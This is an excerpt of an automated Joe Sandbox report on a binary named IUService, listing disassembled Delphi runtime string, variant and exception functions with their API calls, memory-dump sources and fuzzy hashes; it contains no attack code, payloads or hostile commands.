                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C7BC
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C7E7
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C813
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001C8D4), ref: 5001C866
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,5001C8D4), ref: 5001C86B
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C891
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C8D4), ref: 5001C8AD
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001C8D4), ref: 5001C8B9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$System@$System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Copy$qqrx20Stringii$Asg$qqrr20EnsureLen$qqrx20String$qqrr20Stringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 878542493-0
                                                                                                                                            • Opcode ID: 3ab3b303093b8a636e88502fb4d09674c64ae5bfa68a04d5878e1d884443bb8e
                                                                                                                                            • Instruction ID: a5e6bedc7b1fa09ac2a89fd4f76479da9ae694add23f0eb23cd9a90cd4e19f31
                                                                                                                                            • Opcode Fuzzy Hash: 3ab3b303093b8a636e88502fb4d09674c64ae5bfa68a04d5878e1d884443bb8e
                                                                                                                                            • Instruction Fuzzy Hash: 76516E34A04185DBDF11DFA8DD82EADB3F9EF85220B6082A6D500D7295EBB0DEC5D781
                                                                                                                                            Function 50010280 Relevance: 21.2, APIs: 14, Instructions: 153COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50010450,?,?,?,?), ref: 500102B1
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010450,?,?,?,?), ref: 500102CE
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010450,?,?,?,?), ref: 50010306
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,500108D0,00000000,50010450,?,?,?,?), ref: 50010337
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,500108D0,00000000,50010450,?,?,?,?), ref: 5001033C
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 50010392
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 50010397
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010450,?,?,?,?), ref: 500103B4
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 500103E1
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 500103E6
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 5001041C
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 50010421
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$StringSystem@@$Unicode$AnsiExcept$qqrvException@$bctr$qqrp20FromRaiseRecpx14RecxiStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$Internal$Asg$qqrr20Stringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2110080293-0
                                                                                                                                            • Opcode ID: 2acdd1ed6b19c18f9c3d6a13469d4a30c81e8413c8df2a859eca72d6a4b32dc1
                                                                                                                                            • Instruction ID: 3dd440310b7d6b838b62487898f5154655aa6721fdb6a91f51f28f113b154d74
                                                                                                                                            • Opcode Fuzzy Hash: 2acdd1ed6b19c18f9c3d6a13469d4a30c81e8413c8df2a859eca72d6a4b32dc1
                                                                                                                                            • Instruction Fuzzy Hash: 62517F30E012969FEB10CFA4ED81AAEB7F8EF18304F504266E940E7251D7B59E81CB91
                                                                                                                                            Function 50031250 Relevance: 21.1, APIs: 14, Instructions: 139COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Variants@VarResultCheck$qqrl.RTL120(?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 50031275
                                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 500312E9
                                                                                                                                            • @Variants@VarResultCheck$qqrl.RTL120(?,00000001,?,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB), ref: 500312EE
                                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 50031305
                                                                                                                                            • @Variants@VarResultCheck$qqrl.RTL120(?,00000001,?,?,00000001,?,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530), ref: 5003130A
                                                                                                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 5003133E
                                                                                                                                            • @Variants@VarArrayCreateError$qqrv.RTL120(?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 50031349
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 50031354
                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 500313BB
                                                                                                                                            • @Variants@VarResultCheck$qqrl.RTL120(?,?,?,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB), ref: 500313C0
                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 500313D4
                                                                                                                                            • @Variants@VarResultCheck$qqrl.RTL120(00000000,?,?,?,?,?,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530), ref: 500313D9
                                                                                                                                            • VariantCopy.OLEAUT32(?,00000000), ref: 50031409
                                                                                                                                            • @Variants@VarResultCheck$qqrl.RTL120(?,00000000,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB), ref: 5003140E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Variants@$ArrayCheck$qqrlResult$Safe$BoundCreateIndex$Clear$qqrr8CopyDataError$qqrvVariantVariants@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2462754632-0
                                                                                                                                            • Opcode ID: d2226f6f942347185893c2112448d7c493ef7b5df07ef858df8a6411db5986f1
                                                                                                                                            • Instruction ID: 68a44697431ba9d170457ca7a9e020540fd923d0265e6cf9d388f6b8b8de95fb
                                                                                                                                            • Opcode Fuzzy Hash: d2226f6f942347185893c2112448d7c493ef7b5df07ef858df8a6411db5986f1
                                                                                                                                            • Instruction Fuzzy Hash: E951EF759026599FCB16DB98DC91BD9B3FCAF5C200F0442E6F509E7202D6709F858FA1
                                                                                                                                            Function 500262D0 Relevance: 21.1, APIs: 14, Instructions: 113COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,5002647C), ref: 50026303
                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 50026327
                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 50026342
                                                                                                                                            • @Sysutils@AnsiStrRScan$qqrpbb.RTL120(?,?,00000105), ref: 50026366
                                                                                                                                            • @Sysutils@StrLCopy$qqrpbpxbui.RTL120(?,?,00000105), ref: 5002637B
                                                                                                                                            • @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(?,?,00000105), ref: 50026392
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,00000105), ref: 5002639E
                                                                                                                                            • @Sysutils@StrLen$qqrpxb.RTL120(?,?,00000105), ref: 500263A7
                                                                                                                                            • @System@FindResourceHInstance$qqrui.RTL120(0000FFD6,?,00000100,?,?,00000105), ref: 500263D7
                                                                                                                                            • LoadStringW.USER32(00000000,0000FFD6,?,00000100), ref: 500263DD
                                                                                                                                            • @System@TObject@ClassName$qqrv.RTL120(?,?,00000105), ref: 500263EA
                                                                                                                                            • @Sysutils@StrLFmt$qqrpbuit1px14System@TVarRecxi.RTL120(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,00000105), ref: 50026454
                                                                                                                                            • @Sysutils@StrLen$qqrpxb.RTL120(?,?,?,?,?,?,?,?,?,?,?,?,00000105), ref: 5002645C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Sysutils@$ClassFileLen$qqrpxbModuleNameStringSystem@@$AnsiChar$qqrx20Class$qqrp14Copy$qqrpbpxbuiFindFmt$qqrpbuit1px14Instance$qqruiLoadMetaName$qqrvObject@Objectp17QueryRecxiResourceScan$qqrpbbUnicodeVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3883136372-0
                                                                                                                                            • Opcode ID: 26642bce504ab1d5de481313da31769c506bee54e9e21774b4cd9cd9320994c5
                                                                                                                                            • Instruction ID: 811c3105ae2c2e25737f7d5603747125e796c38313662228b4ee9a41d4d60d20
                                                                                                                                            • Opcode Fuzzy Hash: 26642bce504ab1d5de481313da31769c506bee54e9e21774b4cd9cd9320994c5
                                                                                                                                            • Instruction Fuzzy Hash: C3416170A026989FEB20DFA4DC81BCEB7F9AB58300F4045E6E548E7241D7759E94CF90
                                                                                                                                            Function 5001EAD4 Relevance: 19.6, APIs: 13, Instructions: 143COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EB2C
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EB59
                                                                                                                                            • @Sysutils@FormatBuf$qqrpbuipxvuipx14System@TVarRecxi.RTL120(?,?,?,00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EB7E
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EBA0
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EBC4
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EBCE
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EBEB
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EC0B
                                                                                                                                            • @Sysutils@FormatBuf$qqrpbuipxvuipx14System@TVarRecxi.RTL120(?,?,?,00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EC16
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,?,?,00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EC2C
                                                                                                                                            • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EC3F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$String$From$AnsiStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Buf$qqrpbuipxvuipx14FormatLength$qqrr20RecxiStringiSysutils@$Asg$qqrr20CharChar$qqrx20Len$qqrr20StringpbiStringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2011730137-0
                                                                                                                                            • Opcode ID: e0ec65ee7119bda094fea1574f5fbe587e7ff05964032da46d515081ca9c0199
                                                                                                                                            • Instruction ID: 905ef9e5a7d310ec851db8a729e0b9c5fd371b18d59da8299c39f15f331ca2da
                                                                                                                                            • Opcode Fuzzy Hash: e0ec65ee7119bda094fea1574f5fbe587e7ff05964032da46d515081ca9c0199
                                                                                                                                            • Instruction Fuzzy Hash: 03515C70A05199EFDB00DFA8DD8199EB7F9FF88200B6046A6E905E7355D730EE81DB90
                                                                                                                                            Function 5001671C Relevance: 19.6, APIs: 13, Instructions: 136COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016752
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 50016782
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,500168A1), ref: 500167A2
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 500167CD
                                                                                                                                            • @Sysutils@IntToStr$qqri.RTL120(00000000,500168A1), ref: 500167FE
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016808
                                                                                                                                            • @Strutils@DupeString$qqrx20System@UnicodeStringi.RTL120(?,00000000,500168A1), ref: 50016854
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(?,00000000,500168A1), ref: 50016861
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500168A1), ref: 50016871
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$String$From$AnsiStr$qqrr20Stringx20Stringx27System@%T$us$i0$%$Internal$Asg$qqrr20Cat$qqrr20Cat3$qqrr20Char$qqrr20Copy$qqrx20DupeStr$qqriString$qqrx20StringbStringiStringiiStringt2Strutils@Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2114788560-0
                                                                                                                                            • Opcode ID: b7fb9b28b5c2121679e22dd6f35be3f677741a1e7c790f700155013dc50960c1
                                                                                                                                            • Instruction ID: 16ea5a0d39597b1b2e5b354b4af76d672fd4379d434ada6c456a148815a4d04d
                                                                                                                                            • Opcode Fuzzy Hash: b7fb9b28b5c2121679e22dd6f35be3f677741a1e7c790f700155013dc50960c1
                                                                                                                                            • Instruction Fuzzy Hash: DD514770A012998FDF00CFA9DD919AEB7F5FF49214B60466AE500E7395DB34EE81CB90
                                                                                                                                            Function 50023838 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023929), ref: 5002385E
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023929), ref: 50023891
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023929), ref: 500238A0
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000200,00000000,50023929), ref: 500238B4
                                                                                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,50023929), ref: 500238C0
                                                                                                                                            • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,50023929), ref: 500238C6
                                                                                                                                            • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023929), ref: 500238DC
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,00000004,?,00000000,?,00000200,00000000,50023929), ref: 5002390E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$String$Asg$qqrr20Stringx20$Array$qqrr20Char$qqrx20Copy$qqrx20DateFormatFromLocaleStringiiStringpbiThread
                                                                                                                                            • String ID: $yyyy
                                                                                                                                            • API String ID: 1172944777-404527807
                                                                                                                                            • Opcode ID: 88830cba35c6eddecc1ac2c1449b220e654a0ef3beac0e7d82714beb81f21552
                                                                                                                                            • Instruction ID: 71332474c6b87554fb3030c3449044ef5b0949cbd634da679827f02ba86c845d
                                                                                                                                            • Opcode Fuzzy Hash: 88830cba35c6eddecc1ac2c1449b220e654a0ef3beac0e7d82714beb81f21552
                                                                                                                                            • Instruction Fuzzy Hash: 1521D634A066999FEF24DF94D891AAEB3F8EF19300F4041A6F948E7251D7709E40C7E1
                                                                                                                                            Function 500107B0 Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001092F,?,?), ref: 500107DE
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001092F,?,?), ref: 500107FB
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001092F,?,?), ref: 50010833
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,5000FDAE,00000000,5001092F,?,?), ref: 50010864
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,5000FDAE,00000000,5001092F,?,?), ref: 50010869
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001092F,?,?), ref: 50010886
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,5001092F,?,?), ref: 50010892
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001092F,?,?), ref: 500108B3
                                                                                                                                            • @Character@TCharacter@ConvertToUtf32$qqrx20System@UnicodeStringi.RTL120(00000000,5001092F,?,?), ref: 500108CB
                                                                                                                                            • @Character@TCharacter@Initialize$qqrv.RTL120(00000000,5001092F,?,?), ref: 500108DB
                                                                                                                                            Memory Dump Source
